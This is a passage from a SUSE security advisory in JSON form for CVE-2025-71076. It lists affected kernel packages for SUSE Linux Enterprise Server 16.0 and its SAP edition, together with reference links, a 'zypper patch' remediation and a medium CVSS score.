"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71076",
"url": "https://www.suse.com/security/cve/CVE-2025-71076"
},
{
"category": "external",
"summary": "SUSE Bug 1256627 for CVE-2025-71076",
"url": "https://bugzilla.suse.com/1256627"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
